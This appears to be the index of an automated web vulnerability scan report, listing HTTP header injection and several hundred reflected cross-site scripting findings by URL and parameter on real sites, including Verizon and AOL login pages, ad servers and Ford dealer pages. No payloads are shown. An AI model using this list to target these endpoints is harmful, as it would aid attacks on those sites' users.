XSS, Cross Site Scripting, verizon.com, CWE-79, CAPEC-86, DORK, GHDB

1. HTTP header injection

1.1. http://50.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

1.2. http://50.xg4ken.com/media/redir.php [url[] parameter]

1.3. http://vulnerable.verizon.host/adi/N2870.vznbiz/B3160296 [REST URL parameter 1]

1.4. http://vulnerable.verizon.host/dot.gif [REST URL parameter 1]

1.5. http://amch.questionmarket.com/adscgen/st.php [ES cookie]

1.6. http://amch.questionmarket.com/adscgen/st.php [code parameter]

1.7. http://amch.questionmarket.com/adscgen/st.php [site parameter]

1.8. http://anrtx.tacoda.net/rtx/r.js [N cookie]

1.9. http://anrtx.tacoda.net/rtx/r.js [si parameter]

1.10. https://auth.verizon.com/amserver/UI/Login [goto parameter]

1.11. https://auth.verizon.net/amserver/UI/Login [goto parameter]

2. Cross-site scripting (reflected)

2.1. http://abc.go.com/ [name of an arbitrarily supplied request parameter]

2.2. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1]

2.3. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1]

2.4. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 1]

2.5. http://about.aol.com/aolnetwork/trademarks [REST URL parameter 1]

2.6. https://account.login.aol.com/opr/_cqr/opr/opr.psp [authLev parameter]

2.7. http://ad.aggregateknowledge.com/iframe!t=317! [clk0 parameter]

2.8. http://ad.aggregateknowledge.com/iframe!t=317! [clk0 parameter]

2.9. http://vulnerable.verizon.host/adi/N2883.158901.DATAXU.COM/B4947916 [sz parameter]

2.10. http://vulnerable.verizon.host/adi/N3405.Sympatico.ca/B5011284.3 [name of an arbitrarily supplied request parameter]

2.11. http://vulnerable.verizon.host/adi/N3405.Sympatico.ca/B5011284.3 [sz parameter]

2.12. http://vulnerable.verizon.host/adi/N3995.275551.SYMPATICOCANADA/B5002719 [name of an arbitrarily supplied request parameter]

2.13. http://vulnerable.verizon.host/adi/N3995.275551.SYMPATICOCANADA/B5002719 [sz parameter]

2.14. http://vulnerable.verizon.host/adi/N6080.149339.8804879051621/B4137193.79 [name of an arbitrarily supplied request parameter]

2.15. http://vulnerable.verizon.host/adi/N6080.149339.8804879051621/B4137193.79 [sz parameter]

2.16. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [ad parameter]

2.17. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [camp parameter]

2.18. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [goto parameter]

2.19. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [name of an arbitrarily supplied request parameter]

2.20. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [opzn&page parameter]

2.21. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [p parameter]

2.22. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [pos parameter]

2.23. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [sn1 parameter]

2.24. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [sn2 parameter]

2.25. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [snr parameter]

2.26. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [snx parameter]

2.27. http://vulnerable.verizon.host/adj/N4682.Acerno/B4830992.3 [click parameter]

2.28. http://vulnerable.verizon.host/click [h parameter]

2.29. http://vulnerable.verizon.host/click [name of an arbitrarily supplied request parameter]

2.30. http://vulnerable.verizon.host/clk [210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id parameter]

2.31. http://vulnerable.verizon.host/clk [cnt parameter]

2.32. http://vulnerable.verizon.host/clk [gcid parameter]

2.33. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 2]

2.34. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 2]

2.35. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 3]

2.36. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [REST URL parameter 3]

2.37. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [click parameter]

2.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [click parameter]

2.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [name of an arbitrarily supplied request parameter]

2.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [name of an arbitrarily supplied request parameter]

2.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click parameter]

2.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 2]

2.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 2]

2.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 3]

2.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [REST URL parameter 3]

2.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [name of an arbitrarily supplied request parameter]

2.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 2]

2.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 2]

2.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 3]

2.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 3]

2.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [click parameter]

2.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [click parameter]

2.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [name of an arbitrarily supplied request parameter]

2.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [name of an arbitrarily supplied request parameter]

2.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click parameter]

2.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 2]

2.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 2]

2.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 3]

2.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 3]

2.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [name of an arbitrarily supplied request parameter]

2.61. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.62. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 3]

2.63. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 4]

2.64. http://adam-service.app.aol.com/adam-services/api/media/getVideo [brightcoveId parameter]

2.65. http://adam-service.app.aol.com/adam-services/api/media/getVideo [version parameter]

2.66. http://ads.pointroll.com/PortalServe/ [dom parameter]

2.67. http://ads.pointroll.com/PortalServe/ [flash parameter]

2.68. http://ads.pointroll.com/PortalServe/ [r parameter]

2.69. http://ads.pointroll.com/PortalServe/ [redir parameter]

2.70. http://ads.pointroll.com/PortalServe/ [time parameter]

2.71. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

2.72. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

2.73. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

2.74. http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH [AdId parameter]

2.75. http://adserver.adtechus.com/addyn%7C3.0%7C5235%7C1288708%7C0%7C16%7CADTECH [name of an arbitrarily supplied request parameter]

2.76. http://adserver.adtechus.com/addyn/3.0/5214.1/1044213/0/-1/ADTECH [loc parameter]

2.77. http://adserver.adtechus.com/addyn/3.0/5214.1/1044213/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.78. http://adserver.adtechus.com/addyn/3.0/5214.1/1076814/0/-1/ADTECH [loc parameter]

2.79. http://adserver.adtechus.com/addyn/3.0/5214.1/1076814/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.80. http://adserver.adtechus.com/addyn/3.0/5214.1/1076815/0/-1/ADTECH [loc parameter]

2.81. http://adserver.adtechus.com/addyn/3.0/5214.1/1076815/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.82. http://adserver.adtechus.com/addyn/3.0/5214.1/1076816/0/-1/ADTECH [loc parameter]

2.83. http://adserver.adtechus.com/addyn/3.0/5214.1/1076816/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.84. http://adserver.adtechus.com/addyn/3.0/5214.1/1240429/0/-1/ADTECH [loc parameter]

2.85. http://adserver.adtechus.com/addyn/3.0/5214.1/1240429/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.86. http://adserver.adtechus.com/addyn/3.0/5214.1/1245415/0/-1/ADTECH [loc parameter]

2.87. http://adserver.adtechus.com/addyn/3.0/5214.1/1245415/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.88. http://adserver.adtechus.com/addyn/3.0/5214.1/1245417/0/-1/ADTECH [loc parameter]

2.89. http://adserver.adtechus.com/addyn/3.0/5214.1/1245417/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.90. http://adserver.adtechus.com/addyn/3.0/5214.1/1245417/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.91. http://adserver.adtechus.com/addyn/3.0/5214.1/1245418/0/-1/ADTECH [loc parameter]

2.92. http://adserver.adtechus.com/addyn/3.0/5214.1/1245418/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.93. http://adserver.adtechus.com/addyn/3.0/5214.1/906356/0/-1/ADTECH [loc parameter]

2.94. http://adserver.adtechus.com/addyn/3.0/5214.1/906356/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.95. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [loc parameter]

2.96. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [loc parameter]

2.97. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.98. http://adserver.adtechus.com/addyn/3.0/5214.1/906388/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.99. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [loc parameter]

2.100. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [loc parameter]

2.101. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.102. http://adserver.adtechus.com/addyn/3.0/5214.1/906389/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.103. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [loc parameter]

2.104. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [loc parameter]

2.105. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.106. http://adserver.adtechus.com/addyn/3.0/5214.1/965516/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.107. http://adserver.adtechus.com/addyn/3.0/5214.1/965547/0/-1/ADTECH [loc parameter]

2.108. http://adserver.adtechus.com/addyn/3.0/5214.1/965547/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.109. http://adserver.adtechus.com/addyn/3.0/5214.1/965555/0/-1/ADTECH [loc parameter]

2.110. http://adserver.adtechus.com/addyn/3.0/5214.1/965555/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.111. http://adserver.adtechus.com/addyn/3.0/5214.1/965578/0/-1/ADTECH [loc parameter]

2.112. http://adserver.adtechus.com/addyn/3.0/5214.1/965578/0/-1/ADTECH [loc parameter]

2.113. http://adserver.adtechus.com/addyn/3.0/5214.1/965578/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.114. http://adserver.adtechus.com/addyn/3.0/5214.1/965594/0/-1/ADTECH [loc parameter]

2.115. http://adserver.adtechus.com/addyn/3.0/5214.1/965594/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.116. http://adserver.adtechus.com/addyn/3.0/5214.1/965607/0/-1/ADTECH [loc parameter]

2.117. http://adserver.adtechus.com/addyn/3.0/5214.1/965607/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.118. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [loc parameter]

2.119. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [loc parameter]

2.120. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [loc parameter]

2.121. http://adserver.adtechus.com/addyn/3.0/5214.1/965613/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.122. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [loc parameter]

2.123. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [loc parameter]

2.124. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.125. http://adserver.adtechus.com/addyn/3.0/5214.1/965634/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.126. http://adserver.adtechus.com/addyn/3.0/5214.1/965664/0/-1/ADTECH [loc parameter]

2.127. http://adserver.adtechus.com/addyn/3.0/5214.1/965664/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.128. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [loc parameter]

2.129. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [loc parameter]

2.130. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.131. http://adserver.adtechus.com/addyn/3.0/5214.1/965669/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.132. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [loc parameter]

2.133. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [loc parameter]

2.134. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.135. http://adserver.adtechus.com/addyn/3.0/5214.1/965696/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.136. http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.137. http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.138. http://adserver.adtechus.com/addyn/3.0/5214.1/989782/0/-1/ADTECH [loc parameter]

2.139. http://adserver.adtechus.com/addyn/3.0/5214.1/989782/0/-1/ADTECH [name of an arbitrarily supplied request parameter]

2.140. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [loc parameter]

2.141. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [loc parameter]

2.142. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [name of an arbitrarily supplied request parameter]

2.143. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [name of an arbitrarily supplied request parameter]

2.144. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [loc parameter]

2.145. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [loc parameter]

2.146. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [name of an arbitrarily supplied request parameter]

2.147. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [name of an arbitrarily supplied request parameter]

2.148. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [loc parameter]

2.149. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [loc parameter]

2.150. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [name of an arbitrarily supplied request parameter]

2.151. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [name of an arbitrarily supplied request parameter]

2.152. http://adserver.adtechus.com/addyn/3.0/5294.1/1352291/0/225/ADTECH [loc parameter]

2.153. http://adserver.adtechus.com/addyn/3.0/5294.1/1352291/0/225/ADTECH [name of an arbitrarily supplied request parameter]

2.154. http://adserver.adtechus.com/addyn/3.0/5294.1/1352321/0/170/ADTECH [loc parameter]

2.155. http://adserver.adtechus.com/addyn/3.0/5294.1/1352321/0/170/ADTECH [loc parameter]

2.156. http://adserver.adtechus.com/addyn/3.0/5294.1/1352321/0/170/ADTECH [name of an arbitrarily supplied request parameter]

2.157. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 1]

2.158. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 2]

2.159. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 3]

2.160. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]

2.161. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]

2.162. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]

2.163. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]

2.164. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]

2.165. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]

2.166. http://altfarm.mediaplex.com/ad/js/10433-99705-1629-12 [mpt parameter]

2.167. http://altfarm.mediaplex.com/ad/js/10433-99705-1629-12 [mpvc parameter]

2.168. http://altfarm.mediaplex.com/ad/js/10433-99705-1629-12 [name of an arbitrarily supplied request parameter]

2.169. http://artsbeat.blogs.nytimes.com/2010/11/18/anatomy-of-a-scene-harry-potter-and-the-deathly-hallows-part-1/ [src parameter]

2.170. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]

2.171. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]

2.172. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]

2.173. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]

2.174. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]

2.175. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]

2.176. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]

2.177. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]

2.178. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]

2.179. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 1]

2.180. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 2]

2.181. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 3]

2.182. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 4]

2.183. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 5]

2.184. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 6]

2.185. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 7]

2.186. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [name of an arbitrarily supplied request parameter]

2.187. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [noperf parameter]

2.188. http://atwar.blogs.nytimes.com/2010/11/19/recounting-war/ [src parameter]

2.189. https://auth.verizon.com/amserver/UI/Login [goto parameter]

2.190. https://auth.verizon.com/amserver/UI/Login [module parameter]

2.191. https://auth.verizon.com/amserver/UI/Login [realm parameter]

2.192. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.193. http://b.scorecardresearch.com/beacon.js [c10 parameter]

2.194. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.195. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.196. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.197. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.198. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.199. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.200. http://bats.blogs.nytimes.com/2010/11/19/yankees-pick-larry-rothschild-as-pitching-coach/ [src parameter]

2.201. http://blog.games.com/2010/11/10/win-a-trip-to-las-vegas-by-playing-games-com-poker-on-facebook/ [name of an arbitrarily supplied request parameter]

2.202. http://body.aol.com/ [name of an arbitrarily supplied request parameter]

2.203. http://bp2.forddirect.fordvehicles.com/ [name of an arbitrarily supplied request parameter]

2.204. http://bp2.forddirect.fordvehicles.com/2010-Ford-Explorer/ChooseYourPath/ [branding parameter]

2.205. http://bp2.forddirect.fordvehicles.com/2010-Ford-Explorer/ChooseYourPath/ [lang parameter]

2.206. http://bp2.forddirect.fordvehicles.com/2010-Ford-Explorer/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.207. http://bp2.forddirect.fordvehicles.com/2010-Ford-Explorer/ChooseYourPath/ [referringSite parameter]

2.208. http://bp2.forddirect.fordvehicles.com/2010-Ford-ExplorerSportTrac/ChooseYourPath/ [branding parameter]

2.209. http://bp2.forddirect.fordvehicles.com/2010-Ford-ExplorerSportTrac/ChooseYourPath/ [lang parameter]

2.210. http://bp2.forddirect.fordvehicles.com/2010-Ford-ExplorerSportTrac/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.211. http://bp2.forddirect.fordvehicles.com/2010-Ford-ExplorerSportTrac/ChooseYourPath/ [referringSite parameter]

2.212. http://bp2.forddirect.fordvehicles.com/2010-Ford-FocusCoupe/ChooseYourPath/ [branding parameter]

2.213. http://bp2.forddirect.fordvehicles.com/2010-Ford-FocusCoupe/ChooseYourPath/ [lang parameter]

2.214. http://bp2.forddirect.fordvehicles.com/2010-Ford-FocusCoupe/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.215. http://bp2.forddirect.fordvehicles.com/2010-Ford-FocusCoupe/ChooseYourPath/ [referringSite parameter]

2.216. http://bp2.forddirect.fordvehicles.com/2011-Ford-EconolineWagon/ChooseYourPath/ [branding parameter]

2.217. http://bp2.forddirect.fordvehicles.com/2011-Ford-EconolineWagon/ChooseYourPath/ [lang parameter]

2.218. http://bp2.forddirect.fordvehicles.com/2011-Ford-EconolineWagon/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.219. http://bp2.forddirect.fordvehicles.com/2011-Ford-EconolineWagon/ChooseYourPath/ [referringSite parameter]

2.220. http://bp2.forddirect.fordvehicles.com/2011-Ford-Edge/ChooseYourPath/ [branding parameter]

2.221. http://bp2.forddirect.fordvehicles.com/2011-Ford-Edge/ChooseYourPath/ [lang parameter]

2.222. http://bp2.forddirect.fordvehicles.com/2011-Ford-Edge/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.223. http://bp2.forddirect.fordvehicles.com/2011-Ford-Edge/ChooseYourPath/ [referringSite parameter]

2.224. http://bp2.forddirect.fordvehicles.com/2011-Ford-Escape/ChooseYourPath/ [branding parameter]

2.225. http://bp2.forddirect.fordvehicles.com/2011-Ford-Escape/ChooseYourPath/ [lang parameter]

2.226. http://bp2.forddirect.fordvehicles.com/2011-Ford-Escape/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.227. http://bp2.forddirect.fordvehicles.com/2011-Ford-Escape/ChooseYourPath/ [referringSite parameter]

2.228. http://bp2.forddirect.fordvehicles.com/2011-Ford-Expedition/ChooseYourPath/ [branding parameter]

2.229. http://bp2.forddirect.fordvehicles.com/2011-Ford-Expedition/ChooseYourPath/ [lang parameter]

2.230. http://bp2.forddirect.fordvehicles.com/2011-Ford-Expedition/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.231. http://bp2.forddirect.fordvehicles.com/2011-Ford-Expedition/ChooseYourPath/ [referringSite parameter]

2.232. http://bp2.forddirect.fordvehicles.com/2011-Ford-F-150/ChooseYourPath/ [branding parameter]

2.233. http://bp2.forddirect.fordvehicles.com/2011-Ford-F-150/ChooseYourPath/ [lang parameter]

2.234. http://bp2.forddirect.fordvehicles.com/2011-Ford-F-150/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.235. http://bp2.forddirect.fordvehicles.com/2011-Ford-F-150/ChooseYourPath/ [referringSite parameter]

2.236. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fiesta/ChooseYourPath/ [branding parameter]

2.237. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fiesta/ChooseYourPath/ [lang parameter]

2.238. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fiesta/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.239. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fiesta/ChooseYourPath/ [referringSite parameter]

2.240. http://bp2.forddirect.fordvehicles.com/2011-Ford-Flex/ChooseYourPath/ [branding parameter]

2.241. http://bp2.forddirect.fordvehicles.com/2011-Ford-Flex/ChooseYourPath/ [lang parameter]

2.242. http://bp2.forddirect.fordvehicles.com/2011-Ford-Flex/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.243. http://bp2.forddirect.fordvehicles.com/2011-Ford-Flex/ChooseYourPath/ [referringSite parameter]

2.244. http://bp2.forddirect.fordvehicles.com/2011-Ford-FocusSedan/ChooseYourPath/ [branding parameter]

2.245. http://bp2.forddirect.fordvehicles.com/2011-Ford-FocusSedan/ChooseYourPath/ [lang parameter]

2.246. http://bp2.forddirect.fordvehicles.com/2011-Ford-FocusSedan/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.247. http://bp2.forddirect.fordvehicles.com/2011-Ford-FocusSedan/ChooseYourPath/ [referringSite parameter]

2.248. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fusion/ChooseYourPath/ [branding parameter]

2.249. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fusion/ChooseYourPath/ [lang parameter]

2.250. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fusion/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.251. http://bp2.forddirect.fordvehicles.com/2011-Ford-Fusion/ChooseYourPath/ [referringSite parameter]

2.252. http://bp2.forddirect.fordvehicles.com/2011-Ford-Mustang/ChooseYourPath/ [branding parameter]

2.253. http://bp2.forddirect.fordvehicles.com/2011-Ford-Mustang/ChooseYourPath/ [lang parameter]

2.254. http://bp2.forddirect.fordvehicles.com/2011-Ford-Mustang/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.255. http://bp2.forddirect.fordvehicles.com/2011-Ford-Mustang/ChooseYourPath/ [referringSite parameter]

2.256. http://bp2.forddirect.fordvehicles.com/2011-Ford-Ranger/ChooseYourPath/ [branding parameter]

2.257. http://bp2.forddirect.fordvehicles.com/2011-Ford-Ranger/ChooseYourPath/ [lang parameter]

2.258. http://bp2.forddirect.fordvehicles.com/2011-Ford-Ranger/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.259. http://bp2.forddirect.fordvehicles.com/2011-Ford-Ranger/ChooseYourPath/ [referringSite parameter]

2.260. http://bp2.forddirect.fordvehicles.com/2011-Ford-SuperDuty/ChooseYourPath/ [branding parameter]

2.261. http://bp2.forddirect.fordvehicles.com/2011-Ford-SuperDuty/ChooseYourPath/ [lang parameter]

